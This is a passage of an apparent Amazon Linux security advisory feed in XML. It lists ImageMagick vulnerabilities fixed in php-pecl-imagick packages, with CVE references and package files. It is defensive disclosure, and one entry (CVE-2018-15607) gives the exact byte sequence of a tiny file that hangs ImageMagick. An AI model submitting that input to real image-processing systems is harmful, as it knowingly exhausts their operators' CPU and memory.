</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000476" title="" id="CVE-2017-1000476" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11166" title="" id="CVE-2017-11166" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12805" title="" id="CVE-2017-12805" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12806" title="" id="CVE-2017-12806" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18251" title="" id="CVE-2017-18251" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18252" title="" id="CVE-2017-18252" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18254" title="" id="CVE-2017-18254" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18271" title="" id="CVE-2017-18271" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18273" title="" id="CVE-2017-18273" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10177" title="" id="CVE-2018-10177" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10804" title="" id="CVE-2018-10804" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10805" title="" id="CVE-2018-10805" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11656" title="" id="CVE-2018-11656" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12599" title="" id="CVE-2018-12599" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12600" title="" id="CVE-2018-12600" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13153" title="" id="CVE-2018-13153" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14434" title="" id="CVE-2018-14434" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14435" title="" id="CVE-2018-14435" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14436" title="" id="CVE-2018-14436" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14437" title="" id="CVE-2018-14437" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15607" title="" id="CVE-2018-15607" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16328" title="" id="CVE-2018-16328" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16749" title="" id="CVE-2018-16749" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16750" title="" id="CVE-2018-16750" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18544" title="" id="CVE-2018-18544" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20467" title="" id="CVE-2018-20467" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8804" title="" id="CVE-2018-8804" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9133" title="" id="CVE-2018-9133" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10131" title="" id="CVE-2019-10131" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10650" title="" id="CVE-2019-10650" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11470" title="" id="CVE-2019-11470" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11472" title="" id="CVE-2019-11472" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11597" title="" id="CVE-2019-11597" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11598" title="" id="CVE-2019-11598" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12974" title="" id="CVE-2019-12974" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12975" title="" id="CVE-2019-12975" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12976" title="" id="CVE-2019-12976" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12978" title="" id="CVE-2019-12978" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12979" title="" id="CVE-2019-12979" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13133" title="" id="CVE-2019-13133" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13134" title="" id="CVE-2019-13134" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13135" title="" id="CVE-2019-13135" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13295" title="" id="CVE-2019-13295" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13297" title="" id="CVE-2019-13297" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13300" title="" id="CVE-2019-13300" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13301" title="" id="CVE-2019-13301" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13304" title="" id="CVE-2019-13304" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13305" title="" id="CVE-2019-13305" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13306" title="" id="CVE-2019-13306" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13307" title="" id="CVE-2019-13307" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13309" title="" id="CVE-2019-13309" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13310" title="" id="CVE-2019-13310" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13311" title="" id="CVE-2019-13311" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13454" title="" id="CVE-2019-13454" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14980" title="" id="CVE-2019-14980" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14981" title="" id="CVE-2019-14981" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15139" title="" id="CVE-2019-15139" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15140" title="" id="CVE-2019-15140" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15141" title="" id="CVE-2019-15141" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16708" title="" id="CVE-2019-16708" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16709" title="" id="CVE-2019-16709" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16710" title="" id="CVE-2019-16710" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16711" title="" id="CVE-2019-16711" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16712" title="" id="CVE-2019-16712" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16713" title="" id="CVE-2019-16713" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17540" title="" id="CVE-2019-17540" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17541" title="" id="CVE-2019-17541" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19948" title="" id="CVE-2019-19948" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19949" title="" id="CVE-2019-19949" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7175" title="" id="CVE-2019-7175" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7397" title="" id="CVE-2019-7397" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7398" title="" id="CVE-2019-7398" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9956" title="" id="CVE-2019-9956" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php70-pecl-imagick-debuginfo" version="3.4.4" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pecl-imagick-debuginfo-3.4.4-1.7.amzn1.x86_64.rpm</filename></package><package name="php70-pecl-imagick" version="3.4.4" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pecl-imagick-3.4.4-1.7.amzn1.x86_64.rpm</filename></package><package name="php70-pecl-imagick-devel" version="3.4.4" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pecl-imagick-devel-3.4.4-1.7.amzn1.x86_64.rpm</filename></package><package name="php70-pecl-imagick-devel" version="3.4.4" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php70-pecl-imagick-devel-3.4.4-1.7.amzn1.i686.rpm</filename></package><package name="php70-pecl-imagick-debuginfo" version="3.4.4" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php70-pecl-imagick-debuginfo-3.4.4-1.7.amzn1.i686.rpm</filename></package><package name="php70-pecl-imagick" version="3.4.4" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php70-pecl-imagick-3.4.4-1.7.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1814</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1814: medium priority package update for php71-pecl-imagick</title><issued date="2023-08-21 12:14:00" /><updated date="2023-08-23 02:32:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-9956:
In ImageMagick 7.0.8-35 Q16, there is a stack-based buffer overflow in the function PopHexPixel of coders/ps.c, which allows an attacker to cause a denial of service or code execution via a crafted image file.
CVE-2019-7398:
In ImageMagick before 7.0.8-25, a memory leak exists in WriteDIBImage in coders/dib.c.
CVE-2019-7397:
In ImageMagick before 7.0.8-25 and GraphicsMagick through 1.3.31, several memory leaks exist in WritePDFImage in coders/pdf.c.
CVE-2019-7175:
In ImageMagick before 7.0.8-25, some memory leaks exist in DecodeImage in coders/pcd.c.
CVE-2019-19949:
An out-of-bounds read was discovered in ImageMagick when writing PNG images. An attacker may abuse this flaw to trick a victim user into downloading a malicious image file and running it through ImageMagick, causing the application to crash.
CVE-2019-19948:
A heap-based buffer overflow flaw was discovered in ImageMagick when writing SGI images with improper columns and rows properties. An attacker may trick a victim user into downloading a malicious image file and running it through ImageMagick, possibly executing code onto the victim user's system.
CVE-2019-17541:
ImageMagick before 7.0.8-55 has a use-after-free in DestroyStringInfo in MagickCore/string.c because the error manager is mishandled in coders/jpeg.c.
CVE-2019-17540:
ImageMagick before 7.0.8-54 has a heap-based buffer overflow in ReadPSInfo in coders/ps.c.
CVE-2019-16713:
ImageMagick 7.0.8-43 has a memory leak in coders/dot.c, as demonstrated by PingImage in MagickCore/constitute.c.
CVE-2019-16712:
ImageMagick 7.0.8-43 has a memory leak in Huffman2DEncodeImage in coders/ps3.c, as demonstrated by WritePS3Image.
CVE-2019-16711:
ImageMagick 7.0.8-40 has a memory leak in Huffman2DEncodeImage in coders/ps2.c.
CVE-2019-16710:
ImageMagick 7.0.8-35 has a memory leak in coders/dot.c, as demonstrated by AcquireMagickMemory in MagickCore/memory.c.
CVE-2019-16709:
ImageMagick 7.0.8-35 has a memory leak in coders/dps.c, as demonstrated by XCreateImage.
CVE-2019-16708:
ImageMagick 7.0.8-35 has a memory leak in magick/xwindow.c, related to XCreateImage.
CVE-2019-15141:
WriteTIFFImage in coders/tiff.c in ImageMagick 7.0.8-43 Q16 allows attackers to cause a denial-of-service (application crash resulting from a heap-based buffer over-read) via a crafted TIFF image file, related to TIFFRewriteDirectory, TIFFWriteDirectory, TIFFWriteDirectorySec, and TIFFWriteDirectoryTagColormap in tif_dirwrite.c of LibTIFF. NOTE: this occurs because of an incomplete fix for CVE-2019-11597.
CVE-2019-15140:
coders/mat.c in ImageMagick 7.0.8-43 Q16 allows remote attackers to cause a denial of service (use-after-free and application crash) or possibly have unspecified other impact by crafting a Matlab image file that is mishandled in ReadImage in MagickCore/constitute.c.
CVE-2019-15139:
The XWD image (X Window System window dumping file) parsing component in ImageMagick 7.0.8-41 Q16 allows attackers to cause a denial-of-service (application crash resulting from an out-of-bounds Read) in ReadXWDImage in coders/xwd.c by crafting a corrupted XWD image file, a different vulnerability than CVE-2019-11472.
CVE-2019-14981:
In ImageMagick 7.x before 7.0.8-41 and 6.x before 6.9.10-41, there is a divide-by-zero vulnerability in the MeanShiftImage function. It allows an attacker to cause a denial of service by sending a crafted file.
CVE-2019-14980:
In ImageMagick 7.x before 7.0.8-42 and 6.x before 6.9.10-42, there is a use after free vulnerability in the UnmapBlob function that allows an attacker to cause a denial of service by sending a crafted file.
CVE-2019-13454:
ImageMagick 7.0.8-54 Q16 allows Division by Zero in RemoveDuplicateLayers in MagickCore/layer.c.
CVE-2019-13311:
A flaw was found in ImageMagick, containing memory leaks of AcquireMagickMemory due to a wand/mogrify.c error. It was discovered that ImageMagick does not properly release acquired memory when some error conditions occur in the function MogrifyImageList(). An attacker could abuse this flaw by providing a specially crafted image and cause a Denial of Service by using all available memory. Applications compiled against ImageMagick libraries that accept untrustworthy images may be exploited to use all available memory and make them crash.
CVE-2019-13310:
A flaw was found in ImageMagick version 7.0.8-50 Q16, containing memory leaks of AcquireMagickMemory due to an error found in MagickWand/mogrify.c. It was discovered that ImageMagick does not properly release acquired memory when some error conditions occur in the function MogrifyImageList(). Applications compiled against ImageMagick libraries that accept untrustworthy images may be exploited to use all available memory and make them crash. An attacker could abuse this flaw by providing a specially crafted image and cause a Denial of Service by using all available memory.
CVE-2019-13309:
A flaw was found in ImageMagick version 7.0.8-50 Q16, containing memory leaks of AcquireMagickMemory due to the mishandling of the NoSuchImage error in CLIListOperatorImages in MagickWand/operation.c. It was discovered that ImageMagick does not properly release acquired memory in function MogrifyImageList() when some error conditions are met, or the "compare" option is used. Applications compiled against ImageMagick libraries that accept untrustworthy images may be exploited to use all available memory and make them crash. An attacker could abuse this flaw by providing a specially crafted image and cause a Denial of Service by using all available memory.
CVE-2019-13307:
A heap-based buffer overflow was discovered in ImageMagick in the way it parses images when using the evaluate-sequence option. Applications compiled against ImageMagick libraries that accept untrustworthy images and use the evaluate-sequence option or function EvaluateImages may be vulnerable to this flaw. An attacker could abuse this flaw by providing a specially crafted image to make the application crash or potentially execute code.
CVE-2019-13306:
A stack-based buffer overflow was discovered in ImageMagick in the way it writes PNM images due to off-by-one errors. Applications compiled against ImageMagick libraries that accept untrustworthy images or write PNM images may be vulnerable to this flaw. An attacker could abuse this flaw by providing a specially crafted image to make the application crash or potentially execute code.
CVE-2019-13305:
A stack-based buffer overflow was discovered in ImageMagick in the way it writes PNM images due to a misplaced strncpy and off-by-one errors. Applications compiled against ImageMagick libraries that accept untrustworthy images or write PNM images may be vulnerable to this flaw. An attacker could abuse this flaw by providing a specially crafted image to make the application crash or potentially execute code.
CVE-2019-13304:
A stack-based buffer overflow was discovered in ImageMagick in the way it writes PNM images due to a misplaced assignment. Applications compiled against ImageMagick libraries that accept untrustworthy images or write PNM images may be vulnerable to this flaw. An attacker could abuse this flaw by providing a specially crafted image to make the application crash or potentially execute code.
CVE-2019-13301:
ImageMagick 7.0.8-50 Q16 has memory leaks in AcquireMagickMemory because of an AnnotateImage error.
CVE-2019-13300:
A heap-based buffer overflow was discovered in ImageMagick in the way it applies a value with arithmetic, relational, or logical operators to an image due to mishandling columns. Applications compiled against ImageMagick libraries that accept untrustworthy images and use the evaluate-sequence option or function EvaluateImages may be vulnerable to this flaw. An attacker could abuse this flaw by providing a specially crafted image to make the application crash or potentially execute code.
CVE-2019-13297:
A heap-based buffer over-read was discovered in ImageMagick in the way it selects an individual threshold for each pixel based on the range of intensity values in its local neighborhood due to a height of zero mishandle error. Applications compiled against ImageMagick libraries that accept untrustworthy images may be vulnerable to this flaw. An attacker could abuse this flaw by providing a specially crafted image to make the application crash or leak application data.
CVE-2019-13295:
A heap-based buffer over-read was discovered in ImageMagick in the way it selects an individual threshold for each pixel based on the range of intensity values in its local neighborhood due to a width of zero mishandle error. Applications compiled against ImageMagick libraries that accept untrustworthy images may be vulnerable to this flaw. An attacker could abuse this flaw by providing a specially crafted image to make the application crash or leak application data.
CVE-2019-13135:
ImageMagick before 7.0.8-50 has a "use of uninitialized value" vulnerability in the function ReadCUTImage in coders/cut.c.
CVE-2019-13134:
ImageMagick before 7.0.8-50 has a memory leak vulnerability in the function ReadVIFFImage in coders/viff.c.
CVE-2019-13133:
ImageMagick before 7.0.8-50 has a memory leak vulnerability in the function ReadBMPImage in coders/bmp.c.
CVE-2019-12979:
ImageMagick 7.0.8-34 has a "use of uninitialized value" vulnerability in the SyncImageSettings function in MagickCore/image.c. This is related to AcquireImage in magick/image.c.
CVE-2019-12978:
ImageMagick 7.0.8-34 has a "use of uninitialized value" vulnerability in the ReadPANGOImage function in coders/pango.c.
CVE-2019-12976:
It was discovered that ImageMagick does not properly release acquired memory when some error conditions occur in the ReadPCLImage() function. Applications compiled against ImageMagick libraries that accept untrustworthy images may be exploited to use all available memory and make them crash.
An attacker could abuse this flaw by providing a specially crafted image and cause a Denial of Service by using all available memory.
CVE-2019-12975:
It was discovered that ImageMagick does not properly release acquired memory when some error conditions occur in the WriteDPXImage() function. Applications compiled against ImageMagick libraries that accept untrustworthy images may be exploited to use all available memory and make them crash. An attacker could abuse this flaw by providing a specially crafted image and cause a Denial of Service by using all available memory.
CVE-2019-12974:
A NULL pointer dereference in the function ReadPANGOImage in coders/pango.c and the function ReadVIDImage in coders/vid.c in ImageMagick 7.0.8-34 allows remote attackers to cause a denial of service via a crafted image.
CVE-2019-11598:
In ImageMagick 7.0.8-40 Q16, there is a heap-based buffer over-read in the function WritePNMImage of coders/pnm.c, which allows an attacker to cause a denial of service or possibly information disclosure via a crafted image file. This is related to SetGrayscaleImage in MagickCore/quantize.c.
CVE-2019-11597:
In ImageMagick 7.0.8-43 Q16, there is a heap-based buffer over-read in the function WriteTIFFImage of coders/tiff.c, which allows an attacker to cause a denial of service or possibly information disclosure via a crafted image file.
CVE-2019-11472:
ReadXWDImage in coders/xwd.c in the XWD image parsing component of ImageMagick 7.0.8-41 Q16 allows attackers to cause a denial-of-service (divide-by-zero error) by crafting an XWD image file in which the header indicates neither LSB first nor MSB first.
CVE-2019-11470:
The cineon parsing component in ImageMagick 7.0.8-26 Q16 allows attackers to cause a denial-of-service (uncontrolled resource consumption) by crafting a Cineon image with an incorrect claimed image size. This occurs because ReadCINImage in coders/cin.c lacks a check for insufficient image data in a file.
CVE-2019-10650:
In ImageMagick 7.0.8-36 Q16, there is a heap-based buffer over-read in the function WriteTIFFImage of coders/tiff.c, which allows an attacker to cause a denial of service or information disclosure via a crafted image file.
CVE-2019-10131:
An off-by-one read vulnerability was discovered in ImageMagick in the formatIPTCfromBuffer function in coders/meta.c. A local attacker may use this flaw to read beyond the end of the buffer or to crash the program.
CVE-2018-9133:
ImageMagick 7.0.7-26 Q16 has excessive iteration in the DecodeLabImage and EncodeLabImage functions (coders/tiff.c), which results in a hang (tens of minutes) with a tiny PoC file. Remote attackers could leverage this vulnerability to cause a denial of service via a crafted tiff file.
CVE-2018-8804:
WriteEPTImage in coders/ept.c in ImageMagick 7.0.7-25 Q16 allows remote attackers to cause a denial of service (MagickCore/memory.c double free and application crash) or possibly have unspecified other impact via a crafted file.
CVE-2018-20467:
In coders/bmp.c in ImageMagick before 7.0.8-16, an input file can result in an infinite loop and hang, with high CPU and memory consumption. Remote attackers could leverage this vulnerability to cause a denial of service via a crafted file.
CVE-2018-18544:
There is a memory leak in the function WriteMSLImage of coders/msl.c in ImageMagick 7.0.8-13 Q16, and the function ProcessMSLScript of coders/msl.c in GraphicsMagick before 1.3.31.
CVE-2018-16750:
In ImageMagick 7.0.7-29 and earlier, a memory leak in the formatIPTCfromBuffer function in coders/meta.c was found.
CVE-2018-16749:
In ImageMagick 7.0.7-29 and earlier, a missing NULL check in ReadOneJNGImage in coders/png.c allows an attacker to cause a denial of service (WriteBlob assertion failure and application exit) via a crafted file.
CVE-2018-16328:
In ImageMagick before 7.0.8-8, a NULL pointer dereference exists in the CheckEventLogging function in MagickCore/log.c.
CVE-2018-15607:
In ImageMagick 7.0.8-11 Q16, a tiny input file 0x50 0x36 0x36 0x36 0x36 0x4c 0x36 0x38 0x36 0x36 0x36 0x36 0x36 0x36 0x1f 0x35 0x50 0x00 can result in a hang of several minutes during which CPU and memory resources are consumed until ultimately an attempted large memory allocation fails. Remote attackers could leverage this vulnerability to cause a denial of service via a crafted file.
CVE-2018-14437:
ImageMagick 7.0.8-4 has a memory leak in parse8BIM in coders/meta.c.
CVE-2018-14436:
ImageMagick 7.0.8-4 has a memory leak in ReadMIFFImage in coders/miff.c.
CVE-2018-14435:
ImageMagick 7.0.8-4 has a memory leak in DecodeImage in coders/pcd.c.
CVE-2018-14434:
ImageMagick 7.0.8-4 has a memory leak for a colormap in WriteMPCImage in coders/mpc.c.
CVE-2018-13153:
A memory leak was discovered in ImageMagick in the XMagickCommand function in animate.c file. An array of strings, named filelist, is allocated on the heap but not released in case the function ExpandFilenames returns an error code.
CVE-2018-12600:
In ImageMagick 7.0.8-3 Q16, ReadDIBImage and WriteDIBImage in coders/dib.c allow attackers to cause an out of bounds write via a crafted file.
CVE-2018-12599:
In ImageMagick 7.0.8-3 Q16, ReadBMPImage and WriteBMPImage in coders/bmp.c allow attackers to cause an out of bounds write via a crafted file.
CVE-2018-11656:
In ImageMagick 7.0.7-20 Q16 x86_64, a memory leak vulnerability was found in the function ReadDCMImage in coders/dcm.c, which allows attackers to cause a denial of service via a crafted DCM image file.
CVE-2018-10805:
ImageMagick version 7.0.7-28 contains a memory leak in ReadYCBCRImage in coders/ycbcr.c.
CVE-2018-10804:
ImageMagick version 7.0.7-28 contains a memory leak in WriteTIFFImage in coders/tiff.c.
CVE-2018-10177:
An infinite loop has been found in the way ImageMagick reads Multiple-image Network Graphics (MNG) data. An attacker could exploit this to cause a denial of service via crafted MNG file.
CVE-2017-18273:
In ImageMagick 7.0.7-16 Q16 x86_64 2017-12-22, an infinite loop vulnerability was found in the function ReadTXTImage in coders/txt.c, which allows attackers to cause a denial of service (CPU exhaustion) via a crafted image file that is mishandled in a GetImageIndexInList call.
CVE-2017-18271:
In ImageMagick 7.0.7-16 Q16 x86_64 2017-12-22, an infinite loop vulnerability was found in the function ReadMIFFImage in coders/miff.c, which allows attackers to cause a denial of service (CPU exhaustion) via a crafted MIFF image file.
CVE-2017-18254:
A memory leak vulnerability has been discovered in ImageMagick in the WriteGIFImage function of coders/gif.c file. An attacker could use this flaw to cause a denial of service via a crafted file.
CVE-2017-18252:
An issue was discovered in ImageMagick 7.0.7. The MogrifyImageList function in MagickWand/mogrify.c allows attackers to cause a denial of service (assertion failure and application exit in ReplaceImageInList) via a crafted file.
CVE-2017-18251:
A memory leak vulnerability has been discovered in ImageMagick in the ReadPCDImage function of coders/pcd.c file. An attacker could use this flaw to cause a denial of service via a crafted file.
CVE-2017-12806:
In ImageMagick 7.0.6-6, a memory exhaustion vulnerability was found in the function format8BIM, which allows attackers to cause a denial of service.
CVE-2017-12805:
In ImageMagick 7.0.6-6, a memory exhaustion vulnerability was found in the function ReadTIFFImage, which allows attackers to cause a denial of service.
CVE-2017-11166:
The ReadXWDImage function in coders\xwd.c in ImageMagick 7.0.5-6 has a memory leak vulnerability that can cause memory exhaustion via a crafted length (number of color-map entries) field in the header of an XWD file.
CVE-2017-1000476:
ImageMagick 7.0.7-12 Q16, a CPU exhaustion vulnerability was found in the function ReadDDSInfo in coders/dds.c, which allows attackers to cause a denial of service.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000476" title="" id="CVE-2017-1000476" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11166" title="" id="CVE-2017-11166" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12805" title="" id="CVE-2017-12805" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12806" title="" id="CVE-2017-12806" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18251" title="" id="CVE-2017-18251" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18252" title="" id="CVE-2017-18252" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18254" title="" id="CVE-2017-18254" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18271" title="" id="CVE-2017-18271" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18273" title="" id="CVE-2017-18273" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10177" title="" id="CVE-2018-10177" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10804" title="" id="CVE-2018-10804" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10805" title="" id="CVE-2018-10805" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11656" title="" id="CVE-2018-11656" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12599" title="" id="CVE-2018-12599" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12600" title="" id="CVE-2018-12600" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13153" title="" id="CVE-2018-13153" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14434" title="" id="CVE-2018-14434" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14435" title="" id="CVE-2018-14435" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14436" title="" id="CVE-2018-14436" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14437" title="" id="CVE-2018-14437" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15607" title="" id="CVE-2018-15607" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16328" title="" id="CVE-2018-16328" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16749" title="" id="CVE-2018-16749" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16750" title="" id="CVE-2018-16750" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18544" title="" id="CVE-2018-18544" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20467" title="" id="CVE-2018-20467" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8804" title="" id="CVE-2018-8804" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9133" title="" id="CVE-2018-9133" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10131" title="" id="CVE-2019-10131" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10650" title="" id="CVE-2019-10650" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11470" title="" id="CVE-2019-11470" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11472" title="" id="CVE-2019-11472" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11597" title="" id="CVE-2019-11597" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11598" title="" id="CVE-2019-11598" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12974" title="" id="CVE-2019-12974" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12975" title="" id="CVE-2019-12975" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12976" title="" 